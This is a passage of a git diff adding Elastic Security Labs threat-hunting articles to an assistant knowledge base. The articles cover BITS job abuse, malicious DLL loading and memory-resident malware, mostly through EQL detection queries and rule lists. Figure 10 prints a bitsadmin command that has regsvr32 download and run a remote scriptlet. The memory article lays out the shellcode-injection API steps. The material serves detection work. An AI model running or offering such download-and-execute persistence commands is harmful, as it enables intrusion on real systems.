+Figure 10 shows an example of how the above parameters can be used to create a BITS job. The below example from the [bitsadminexec](https://github.com/3gstudent/bitsadminexec) project demonstrates how bitsadmin.exe can be used to execute the Squiblydoo technique, discovered by [Casey Smith](https://twitter.com/subTee). Squiblydoo utilizes regsvr32.exe to download an XML file that contains scriptlets for executing code on the victim machine. This [sample](https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct) executes calc.exe, but it’s a good use case for how this could be used maliciously:
+
+```
+# create backdoor
+bitsadmin /create backdoor
+bitsadmin /addfile backdoor %comspec%  %temp%\cmd.exe
+bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"
+bitsadmin /Resume backdoor
+```
+
+_Figure 10 - Example of using bitsadmin.exe to execute Squiblydoo_
+
+Since BITS [version 4.0](https://docs.microsoft.com/en-us/windows/win32/bits/what-s-new) (standard in Windows Server 2008 R2 and Windows 7), PowerShell cmdlets can also be used to create and manage file transfer jobs. The PowerShell [cmdlets](https://docs.microsoft.com/en-us/windows/win32/bits/bits-powershell-commands) for BITS provide much of the same functionality as the bitsadmin.exe command line utility, a subset of which are depicted in Figure 11:
+
+```
+Add-BitsFile - add one or more files to a BITS transfer
+Resume-BitsTransfer - resumes a suspended BITS transfer job
+Set-BitsTransfer - modifies the properties of a BITS transfer job
+Start-BitsTransfer - create and start a BITS transfer job
+```
+
+_Figure 11 - Common PowerShell cmdlets for BITS_
+
+A good cmdlet to monitor is Start-BitsTransfer. The local and remote names of the file are specified in the Source and Destination parameters. This can be depicted as seen in Figure 12. As stated previously, analysts should monitor suspicious script block logging events, Event ID 4104, in the Microsoft-Windows-PowerShell/Operational log.
+
+![Figure 12 - PowerShell scriptblock event from Microsoft-Windows-PowerShell/Operational log](/assets/images/hunting-for-persistence-using-elastic-security-part-2/adversary-tradecraft-101-part-2-image3.jpg)
+
+## Hunting for malicious BITS jobs
+
+The EQL query in Figure 13 demonstrates some of the command line arguments you might see while hunting for malicious use of bitsadmin.exe. The query searches for a process creation event for the bitsadmin.exe binary and the common command line parameters associated with the creation or transfer of a BITS job, and returns unique results based on the command line value. Focusing on unique results while hunting allows us to narrow our focus and more easily spot anomalous activity.
+
+```
+process where subtype.create and
+  process_name == "bitsadmin.exe" and
+  wildcard(command_line, "*Transfer*", "*Create*", "*AddFile*", "*SetNotifyCmdLine*",
+                        "*SetMinRetryDelay*", "*Resume*")
+| unique command_line
+```
+
+_Figure 13 - EQL query looking for common bitsadmin.exe command line parameters_
+
+Additionally, during rule creation, you have the option to enable a "Reflex Response." With “Reflex Response,” if such behavior defined in a custom rule is detected, it uses Endpoint Security’s unique telemetry-gathering and enrichment to execute an automated response before damage and loss can occur (Figure 14). This functionality enables analysts to take action to stop the malicious behavior and then investigate the events that led up to and occurred after the threat, as opposed to investigating a current threat that may be past the point of remediation.
+
+![Figure 14 - Reflex Response in Elastic Endpoint Security](/assets/images/hunting-for-persistence-using-elastic-security-part-2/adversary-tradecraft-101-part-2-image4.jpg)
+
+Executing an EQL hunt in the Endpoint Security product using the EQL query from above can lead to finding real-world campaigns like Qbot, shown in Figure 15.
+
+![Figure 15 - Results of EQL hunt in Elastic Endpoint Security](/assets/images/hunting-for-persistence-using-elastic-security-part-2/adversary-tradecraft-101-part-2-image5.png)
+
+## Real-world example: Qbot malware
+
+QBot is a widely distributed banking Trojan that is capable of self-replication and has historically relied on PowerShell. Recently, however, it may have been [abandoned](https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/) in favor of bitsadmin.exe — an application unlikely to be scrutinized as aggressively.
+
+This variant utilizes a .vbs dropper by masquerading as a .doc file, as Windows still hides the original filename extension by default. Upon execution, in this case via the parent process wscript.exe, the malware spawns bitsadmin.exe to create a transfer job that downloads a subsequent payload, shown in the Timeline view in the SIEM app (Figure 16).
+
+![Figure 16 - Process arguments from Qbot banking malware shown in the Elastic SIEM](/assets/images/hunting-for-persistence-using-elastic-security-part-2/adversary-tradecraft-101-part-2-image6.png)
+
+Analyzing the process.args field values as depicted in Figure 17 reveals that the malware takes the following actions:
+
+- Creates a randomly named transfer job with high priority
+- Uses bitsadmin.exe to download its second stage payload from a command & control (C2) server (Note that widgetcontrol.png is actually a Windows executable)
+- Base64 encodes data on the endpoint’s operating system version and antivirus software, which it passes back to C2 in the beacon URI
+- Randomizes the name of the payload and writes it to a subfolder of the %AppData% path
+
+![Figure 17 - Analysis of process arguments from Qbot banking malware](/assets/images/hunting-for-persistence-using-elastic-security-part-2/adversary-tradecraft-101-part-2-image7.png)
+
+This example showcases how bitsadmin.exe can be used by threat actors to attempt to bypass traditional defenses by using a less common, built-in utility. This application is effectively used by threat actors for transferring files and maintaining a presence in a victim environment.
+
+## Others BITS and pieces
+
+The Microsoft_Windows_Bits_Cient Operational.evtx log file is a native Microsoft event log. It records every operation executed by the BITS client, either via bitsadmin.exe or PowerShell. Within that log store, Event ID 3 is used when The BITS service creates a new job. [Winlogbeat](https://www.elastic.co/downloads/beats/winlogbeat) can be configured to monitor that event.provider as shown in Figure 18. Elastic Security provides telemetry, detections, and threat hunting capabilities for BITS abuse at enterprise scale.
+
+![Figure 18 - Microsoft-Windows-Bit-Client event from Winlogbeat](/assets/images/hunting-for-persistence-using-elastic-security-part-2/adversary-tradecraft-101-part-2-image8.png)
+
+## Conclusion
+
+In this blog series, we examined popular techniques that attackers use to maintain a presence in their target environments. The number of techniques in an attacker’s arsenal can seem daunting at first, but we demonstrated a formulaic approach to examining, hunting for, and detecting techniques effectively. By building comprehension around adversary tradecraft, you can identify interesting patterns, behaviors, and artifacts that you can use to your advantage.
+
+Elastic Security makes hunting for persistence easy. The features of Elastic Endpoint Security and SIEM — along with the protections provided out of the box — lower the barriers to entry for analysts, provides detailed visibility into endpoint activity, and enables organizations to prevent, detect, and respond to malicious behavior at scale.
+
+Try [Elastic SIEM](https://www.elastic.co/security/siem) for free today. To learn more about threat hunting, download a free copy of [The Elastic Guide to Threat Hunting](https://ela.st/threat-hunting).
+
+View our webinar on [Hunting for persistence using Elastic Security](https://www.elastic.co/webinars/hunting-for-persistence-using-elastic-security).
+
+Plus, [EQL support is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581)!
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_for_suspicious_windows_libraries_for_execution_and_evasion.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_for_suspicious_windows_libraries_for_execution_and_evasion.md
new file mode 100644
index 0000000000000..7db7cbd8cf190
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_for_suspicious_windows_libraries_for_execution_and_evasion.md
@@ -0,0 +1,246 @@
+---
+title: "Hunting for Suspicious Windows Libraries for Execution and Defense Evasion"
+slug: "Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion"
+date: "2023-03-01"
+description: "Learn more about discovering threats by hunting through DLL load events, one way to reveal the presence of known and unknown malware in noisy process event data."
+author:
+  - slug: samir-bousseaden
+image: "blog-thumb-roman-columns.jpg"
+category:
+  - slug: security-operations
+  - slug: security-research
+  - slug: detection-science
+tags:
+  - detection engineering
+  - threat hunting
+  - threat detection
+---
+
+Dynamic-link library (DLL) image loads is one of the noisiest types of event in Windows, which may discourage defenders from using it for detection engineering or threat hunting. Even if logged in some environments, it’s often limited to function-specific DLLs such as scheduled tasks (taskschd.dll), Windows Management Instrumentation (wmiutil.dll) and potentially DLLs loading from a few suspicious folders. In addition to the data volume issue, the false positive (FP) rate of the detection rules using DLL events also tend to be proportional to the data volume.
+
+Unfortunately, both advanced adversaries and also commodity malwares are taking advantage of those limitations to increase the chances of their attack success, especially during the delivery phase via diverse spear phishing procedures.
+
+The most commonly observed delivery techniques are the following :
+
+- Loading malicious DLLs using binary execution proxies Rundll32 and Regsvr32
+- Sideloading a malicious DLL from a virtual disk image (ISO/VHD files) into a convenient signed benign binary
+- Extracting a DLL from a malicious Microsoft Office document (i.e. Word, Excel) and immediately loading it via Visual Basic for Applications (VBA)
+- Downloading or extracting a DLL using a [lolbin](https://lolbas-project.github.io/) and loading it by another program
+- Sideloading a malicious DLL extracted from a compressed archive (zip, rar, etc) into a signed benign binary
+- Dropping a malicious DLL in the current directory of an existing program vulnerable to DLL sideloading (e.g. OneDrive, Slack, Teams) via one of several means
+- Less common but also very effective is the use of Windows Installer MSIEXEC to load a malicious DLL
+
+# What DLL events do we log with Elastic Endpoint ?
+
+With the exception of the following Microsoft DLLs, Elastic endpoint since version 7.16 records all non-Microsoft signed DLLs: ![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/table1.jpg)
+
+We also added some enrichments to both DLL and process events that records the following metadata: ![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/table2.jpg)
+
+Below is an example of device information for DLL and Process execution from mounted ISO and VHD files, two file objects increasingly used to deliver malware: ![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image14.jpg)
+
+Here is an example of process execution relative file creation and modification times for svchost.exe : ![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image18.jpg)
+
+The relative execution time enrichment will help us create less noisy detection rules (we can match our rules against the first or few image load or process execution instances), and the device information will allow us to better target suspicious use of ISO/VHD files for malicious purposes.
+
+# Detection
+
+In this section we share some detection ideas that are both reliable signals and effectively match the most common scenarios we mentioned earlier.
+
+## DLL via Rundll32 / Regsvr32
+
+As captured in our own [Global Threat Report](https://www.elastic.co/security-labs/2022-elastic-global-threat-report-announcement), Rundll32 and Regsvr32 lolbins are two of the most abused binary execution proxies. These utilities can load malicious DLLs and are a commonly seen component of many phishing attacks (malicious shortcuts, ISO file, macro enabled documents): ![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image7.jpg)
+
+During a recent period of about 90 days, our internal malware sandbox saw roughly 21K malware alerts where the malicious file was a DLL loaded by either regsvr32 or to a lesser degree rundll32.
+
+The following two endpoint behavior protection rules are effective against about 80% of those samples (~17k out of ~21k) leveraging rundll32 or regsvr32 to execute malicious modules: - [Unusual DLL Extension Loaded by Rundll32 or Regsvr32](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_unusual_dll_extension_loaded_by_rundll32_or_regsvr32.toml)- [RunDLL32/Regsvr32 Loads Dropped Executable](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_rundll32_regsvr32_loads_dropped_executable.toml)
+
+### Rundll32 or Regsvr32 Executing an oversized File
+
+The following EQL query correlates creation of an executable file event with file size equal or greater than 100MB (this threshold can be adjusted to your environment) subsequently followed by being loaded as a DLL via rundll32 or regsvr32:
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image23.jpg)
+
+Below are examples of malicious control panel (CPL) files with sizes over 700MB, a technique used to bypass AV file scanning and reputation-based cloud services that implement a maximum file size for uploaded files:
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image34.jpg)
+
+### Rundll32 or Regsvr32 loading a DLL with a suspicious original file name
+
+Some malicious DLLs have a suspicious original file name, such as ending with .EXE extension or with a great mismatch between the length of the original file name and the actual DLL name. This kind of defense evasion is less common and is employed by a good number of known malware families:
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image10.jpg)
+
+A few examples:
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image33.jpg)
+
+## DLL via Disk Images
+
+Embedding malicious payloads in virtual disk images isn’t new or particularly novel, but the technique has gained in popularity among commodity malware families.
+
+### Suspicious ImageLoad from an ISO Mounted Device
+
+The following rule looks for the execution of commonly-abused Windows binaries to load a DLL from a mounted virtual disk image:
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image9.jpg)
+
+Below are some example of the technique:
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image20.jpg)
+
+### Suspicious Microsoft Image Loaded from a Disk Image
+
+The following rule is triggered when an executable, running from a mounted virtual disk image (.vhd, .iso), loads a suspicious Microsoft-signed DLL such as the taskschd, bitsproxy or vaultclient modules that are associated with some common malware capabilities like persistence, credential access, and evasion.
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image30.jpg)
+
+This query identifies many commodity malware families delivered via ISO files:
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image6.jpg)
+
+### Potential DLL SideLoad via a Renamed Signed Binary
+
+The following query identifies attempts to load an unsigned DLL from a mounted virtual disk (.iso, .vhd) and using a renamed signed binary (original file name is different than the process name).
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image25.jpg)
+
+This depicts some examples of matches where a signed and renamed program is loading a DLL from a mounted disk image:
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image15.jpg)
+
+### Potential DLL SideLoad via a Microsoft Signed Binary
+
+This detection identifies attempts to load unsigned DLLs from a mounted virtual disk (.iso, .vhd) and using a signed Microsoft binary:
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image3.jpg)
+
+Below is an example in which Microsoft OneDrive and Windows Control Panel executables are abused to sideload malicious modules for initial access and execution.
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image19.jpg)
+
+## DLL from Archive Files
+
+Similarly to virtual disk images, attackers can also use ZIP/RAR archive files with embedded malicious DLL paired with a trusted binary or a shortcut (LNK) file to gain access.
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image5.jpg)
+
+The following screen capture shows how this query identifies a malicious file from a RAR archive which was auto-extracted into a temporary user directory. This scenario is moderately common.
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image27.jpg)
+
+## DLL via Malicious Documents
+
+Microsoft Office documents can be also used to deploy and load a malicious DLL to avoid spawning a suspicious child process. The following query correlates an executable (PE) file creation event with a DLL load event.
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image11.jpg)
+
+Below are some examples of malicious Word and Excel documents using this delivery technique.
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image16.jpg)
+
+## DLL via MSIEXEC
+
+MsiExec is another great option when you need to execute malicious DLLs because this activity blends in well with legitimate software installers. Two observed delivery methods are:
+
+- Calling the DLLRegisterServer export from a random DLL using the command-line arguments /y or /z as documented here
+- Build an installer that uses custom actions to load and execute a DLL as documented here and here
+
+The following query can be used to identify the execution of the built-in Windows Installer, MSIEXEC, to call the exported function and run code:
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image26.jpg)
+
+Examples where MSI is used to load malicious DLLs:
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image4.jpg)
+
+DLLs delivered via Windows Installer custom actions can be detected by correlating a DLL file creation event where the calling process is MsiExec and where that DLL is subsequently loaded by the same MsiExec process.
+
+It's worth noting that there are some legitimate uses of Windows Installer custom actions and this query may require some filtering in environments where those are used.
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image12.jpg)
+
+The following query matches the Gwisin Ransomware documented by [AhnLab](https://asec.ahnlab.com/en/37483/) and for which a [PoC](https://github.com/ChoiSG/GwisinMsi) has been created.
+
+## DLL delivery via lolbins
+
+Some malware relies on trusted Microsoft binaries to download, decode or extract DLLs. This query correlates PE file creation or modification by common built-in tools, followed by an image load.
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image13.jpg)
+
+Examples of malware identified using this detection approach:
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image28.jpg)
+
+## DLL sideload into existing program
+
+The following detection identifies attempts to load a recently-created and unsigned DLL file by an already existing signed process within the same current directory. Comparing the difference between the creation time of the existing program and the DLL creation time we can spot these kinds of anomalies.
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image29.jpg)
+
+The next example matches when the malicious secure32.dll process (created 28 seconds ago) is written to the current OneDrivedirectory and automatically loaded by OneDrive.exe (created 2.5 years ago):
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image17.jpg)
+
+## DLL loading from suspicious directories
+
+Dropping a DLL to a user-writable directories and side loading that with a trusted binary is also a common pattern. The following query looks for this behavior and, by leveraging relative creation and modification times, it can reduce the alerts volume while limiting those to a time window following initial execution.
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image8.jpg)
+
+The most commonly-targeted user-writable directories are `?:\Users\Public` and `?:\ProgramData`. The full query containing more than 70 suspicious folders can be found [here](https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml).
+
+Below see a example depicting malicious matches where various trusted binaries were abused to load malicious DLLs: ![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image2.jpg)
+
+![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image21.jpg)
+
+## DLL load with a abnormal creation time
+
+Another interesting scenario is identifying a DLL load event where the DLL has a suspicious creation time, and which could be a result of timestomping. This query compares inconsistencies between the creation time and filename modification time using dll.Ext.relative_file_name_modify_time and dll.Ext.relative_file_creation_time immediately followed by an image load: ![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image1.jpg)
+
+The following is an example where malware drop DLLs in trusted directories and then use timestomping to ensure those DLLs blend in with existing files in those directories: ![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image22.jpg)
+
+## DLL from removable device
+
+DLL side-loading from a removable device is still a valid infection vector, especially for air-gapped networks. An example was recently shared by [Mandiant](https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia) involving an espionage-oriented threat. The following EQL query can be used to find similar behavior: ![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image24.jpg)
+
+Here is an example with several matches: ![](/assets/images/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion/image31.jpg)
+
+## Protection Rules
+
+Elastic provides significant capabilities for identifying unusual or malicious library load events with existing behavior protection rules that take advantage of Windows Libraries events:
+
+- [NTDLL Loaded from an Unusual Path](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_ntdll_loaded_from_an_unusual_path.toml)
+- [Suspicious NTDLL Image Load](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_ntdll_image_load.toml)
+- [DLL Loaded from an Archive File](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_dll_loaded_from_an_archive_file.toml)
+- [Microsoft Office Loaded a Dropped Executable File](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_microsoft_office_loaded_a_dropped_executable_file.toml)
+- [Suspicious ImageLoad from an ISO Mounted Device](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_imageload_from_an_iso_mounted_device.toml)
+- [Potential Evasion via Oversized Image Load](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_evasion_via_oversized_image_load.toml)
+- [Suspicious ImageLoad via Windows Update Auto Update Client](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_imageload_via_windows_update_auto_update_client.toml)
+- [Privilege Escalation via Microsoft Exchange DLL Hijacking](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_privilege_escalation_via_microsoft_exchange_dll_hijacking.toml)
+- [Potential DLL SideLoad via a Microsoft Signed Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_dll_sideload_via_a_microsoft_signed_binary.toml)
+- [Potential DLL SideLoad via a Renamed Signed Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_dll_sideload_via_a_renamed_signed_binary.toml)
+- [Library Load of a File Written by a Signed Binary Proxy](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_library_load_of_a_file_written_by_a_signed_binary_proxy.toml)
+- [Potential DLL Search Order Hijacking of an Existing Program](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_dll_search_order_hijacking_of_an_existing_program.toml)
+- [Suspicious DLLRegisterServer Execution via MSIEXEC](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_dllregisterserver_execution_via_msiexec.toml)
+- [ImageLoad of a File dropped via SMB](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/lateral_movement_imageload_of_a_file_dropped_via_smb.toml)
+- [RunDLL32/Regsvr32 Loads Dropped Executable](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_rundll32_regsvr32_loads_dropped_executable.toml)
+- [Unusual DLL Extension Loaded by Rundll32 or Regsvr32](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_unusual_dll_extension_loaded_by_rundll32_or_regsvr32.toml)
+- [RunDLL32/Regsvr32 Loads a DLL Downloaded via BITS](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_rundll32_regsvr32_loads_a_dll_downloaded_via_bits.toml)
+- [Potential Initial Access via DLL Search Order Hijacking](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_initial_access_via_dll_search_order_hijacking.toml)
+- [Suspicious Control Panel DLL Loaded by Explorer](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_control_panel_dll_loaded_by_explorer.toml)
+- [Protected Process Light Bypass via DLL Tampering](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_protected_process_light_bypass_via_dll_tampering.toml)
+- [Potential Privilege Escalation via DLL Redirection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_potential_privilege_escalation_via_dll_redirection.toml)
+- [Potential Privilege Escalation via Missing DLL](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_potential_privilege_escalation_via_missing_dll.toml)
+- [Potential Privilege Escalation via Elevated IFileOperation](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_potential_privilege_escalation_via_elevated_ifileoperation.toml)
+- [Suspicious DLL Loaded by Svchost](https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_service_dll_unsigned.toml)
+- [Suspicious DLL Loaded from a Removable Media](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_suspicious_dll_loaded_from_a_removable_media.toml)
+- [Suspicious Control Panel DLL Loaded by Explorer](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_control_panel_dll_loaded_by_explorer.toml)
+- [Dynwrapx Image Load via Windows Scripts](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_dynwrapx_image_load_via_windows_scripts.toml)
+- [Suspicious Image Load via Windows Scripts](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_image_load_via_windows_scripts.toml)
+- [Potential Image Load with a Spoofed Creation Time](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_image_load_with_a_spoofed_creation_time.toml)
+
+## Conclusion
+
+Compared to detections that rely on process execution events and where adversaries expose more detection opportunities via command-line flags and parent process relationships, designing detections based on DLL events requires more enrichment and correlation to decrease noise rate and increase confidence.
+
+In this publication we shared numerous examples of how we’re using DLL events to identify threats. You can use the different capabilities Elastic endpoint offers to produce higher signal alerts, too. Given the multitude of methods of delivering malicious code as DLLs, though, relying on behavioral detections alone is not enough. Combining this logic with malware file classification, shellcode detection features, and user-entity based analytics (UEBA) improves the fidelity of this metadata for detection purposes.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_memory.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_memory.md
new file mode 100644
index 0000000000000..a1fd161df5ccf
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_memory.md
@@ -0,0 +1,109 @@
+---
+title: "Hunting In Memory"
+slug: "hunting-memory"
+date: "2022-06-21"
+description: "Threat Hunters are charged with the difficult task of sifting through vast sources of diverse data to pinpoint adversarial activity at any stage in the attack."
+author:
+  - slug: joe-desimone
+image: "blog-thumb-generic-black.jpg"
+category:
+  - slug: security-research
+---
+
+Threat Hunters are charged with the difficult task of sifting through vast sources of diverse data to pinpoint adversarial activity at any stage in the attack lifecycle. To be successful, hunters must continually hone their subject matter expertise on the latest attacker techniques and detection methods. Memory resident malware, which presents itself in many forms, is an attacker technique that has existed for over a decade. The popularity of memory resident malware has steadily [increased](https://www.cyber.nj.gov/threat-analysis/fileless-evasive-intrusion-tactics-pose-challenge-for-network-defense) over time, possibly resulting from the proliferation of code and knowledge of in memory techniques. More likely, its popularity reflects the success of memory-based techniques to evade detection by security products and practitioners. Once limited to advanced adversaries, memory resident techniques are now commonplace for all levels of adversary sophistication. I will examine the most common of these memory based attacker techniques, and walk through our team’s research to craft a scalable, low noise approach to hunting for adversaries that are hiding in memory.
+
+## Attacker Techniques
+
+Before I address memory hunting methods to detect adversaries in your network, it is helpful to understand the common forms of memory resident malware. These techniques include shellcode injection, reflective DLL injection, memory module, process and module hollowing, and Gargoyle (ROP/APC).
+
+### SHELLCODE INJECTION
+
+Shellcode injection is the most basic in-memory technique and has also been around the longest. The basic ‘recipe’ for shellcode injection is a four step process. These steps are: 1) open a target process (OpenProcess); 2) allocate a chunk of memory in the process (VirtualAllocEx); 3) write the shellcode payload to the newly allocated section (WriteProcessMemory); and 4) create a new thread in the remote process to execute the shellcode (CreateRemoteThread). The venerable [Poison Ivy](https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf) malware uses this technique, which is a big reason why so many APT groups were drawn to it over the years.
+
+If you pull up a Poison Ivy [sample](https://www.virustotal.com/en/file/e0a8e823b446764e2b536e81d3fefaa9a562dd8c0614b3bdb345233de27e216a/analysis/)with x64dbg and set a breakpoint on VirtualAllocEx, you will soon locate the chunk of code responsible for the injection.
+
+![Shellcode Injection](/assets/images/hunting-memory/endgame-shellcode-injection.jpg)
+
+![Shellcode Injection](/assets/images/hunting-memory/endgame-shellcode-injection-2.jpg)
+
+In the first image, the push 40 instruction preceding the call to VirtualAllocEx corresponds to page access protection value of PAGE_EXECUTE_READWRITE. In the following screenshot from [ProcessHacker](http://processhacker.sourceforge.net/) of the memory layout of a Poison Ivy implant, you can see it allocates a number of these RWX sections.
+
+![Poison Ivy Implant](/assets/images/hunting-memory/endgame-poinson-ivy-implant.jpg)
+
+Typical code sections are of type ‘Image’ and map to a file on disk. However, these are type ‘Private’ and do not map to a file on disk. They are therefore referred to as unbacked executable sections or floating code. Threads starting from these types of memory regions are anomalous and a good indicator of malicious activity. ProcessHacker can also show you the call stack of the malware threads. There are multiple functions in the call stack which do not map to memory associated with loaded modules.
+
+![ProcessHacker](/assets/images/hunting-memory/endgame-processhacker.jpg)
+
+### REFLECTIVE DLL INJECTION
+
+Reflective DLL injection, originally developed by [Steven Fewer](https://github.com/stephenfewer/ReflectiveDLLInjection), is another type of in memory attacker technique. Metasploit’s [Meterperter](https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter) payload was one of the first attempts to fully weaponize the technique, but many malware families use it today. Reflective DLL injection works by creating a DLL that maps itself into memory when executed, instead of relying on the Window’s loader. The injection process is identical to shellcode injection, except the shellcode is replaced with a self-mapping DLL. The self-mapping component added to the DLL is responsible for resolving import addresses, fixing relocations, and calling the DllMain function. Attackers benefit from the ability to code in higher level languages like C/C++ instead of assembly.
+
+Classic reflective DLL injection, such as that used by Meterpreter, is easy for hunters to find. It leaves large RWX memory sections in the process, even when the meterpreter session is closed. The start of these unbacked executable memory sections contain the full MZ/PE header, as shown in the images below. However, keep in mind that other reflective DLL implementations could wipe the headers and fix the memory leak.
+
+![Unbacked executable memory sections](/assets/images/hunting-memory/_endgame-unbacked-executable-memory-sections.jpg)
+
+![unbacked executable memory sections](/assets/images/hunting-memory/_endgame-unbacked-executable-memory-sections-2.jpg)
+
+The DLLs loaded in memory also conveniently export a self-describing function called ReflectiveLoader().
+
+### ![Reflective Loader](/assets/images/hunting-memory/endgame-reflective-loader.jpg)
+
+### MEMORY MODULE
+
+[Memory module](https://github.com/fancycode/MemoryModule) is another memory resident attacker technique. It is similar to Reflective DLL injection except the injector or loader is responsible for mapping the target DLL into memory instead of the DLL mapping itself. Essentially, the memory module loader re-implements the LoadLibrary function, but it works on a buffer in memory instead of a file on disk. The original implementation was designed for mapping in the current process, but updated techniques can map the module into [remote processes](https://github.com/DarthTon/Blackbone). Most implementations respect the section permissions of the target DLL and avoid the noisy RWX approach.
+
+[NetTraveler](https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests) is one malware family that uses a memory module style technique. When NetTraveler starts, it unpacks the core functionality and maps it into memory. The page permissions more closely resemble a legitimate DLL, however the memory regions are still private as opposed to image.
+
+![NetTraveler page permissions](/assets/images/hunting-memory/endgame-nettraveler-permissions.jpg)
+
+The active threads have start addresses at these private regions. The callstack also reveals these malicious sections.
+
